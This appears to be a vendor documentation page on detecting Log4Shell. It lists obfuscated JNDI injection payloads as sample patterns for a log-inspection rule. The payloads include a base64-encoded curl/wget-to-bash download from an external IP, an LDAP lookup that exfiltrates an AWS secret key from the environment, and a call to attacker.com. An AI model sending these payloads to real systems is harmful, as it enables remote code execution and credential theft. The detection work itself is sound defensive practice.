| 1 | ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MCl8YmFzaA==} |
| 2 | ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback} |
| 3 | ${${lower:jn}di:ldap://172.31.39.127:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=} |
| 4 | ${${l${lower:ow}er:j}ndi:ldap://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 5 | ${jndi${lower::}ldap:${lower:/}/172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 6 | ${jndi${lower::${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}}ldap:${lower:/}/172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 7 | ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 8 | ${jndi:ldap://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 9 | ${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 10 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 11 | ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 12 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:dn}${lower:s}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 13 | ${${::-j}ndi:rmi://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 14 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:iio}${lower:p}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 15 | ${${lower:jndi}:${lower:rmi}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo} |
| 16 | ${jndi:ldap://172.31.39.127:1399/path/${env:aws_secret_key}} |
| 17 | ${${::-j}ndi:rmi://attacker.com/poc} |
Views:
A custom LI rule can be created to detect patterns as discovered in the future. Users may follow the steps located at Define a Log Inspection rule for use in policies - Workload Security | Trend Micro Cloud One™ Documentation and add the following sample patterns in the pattern matching field: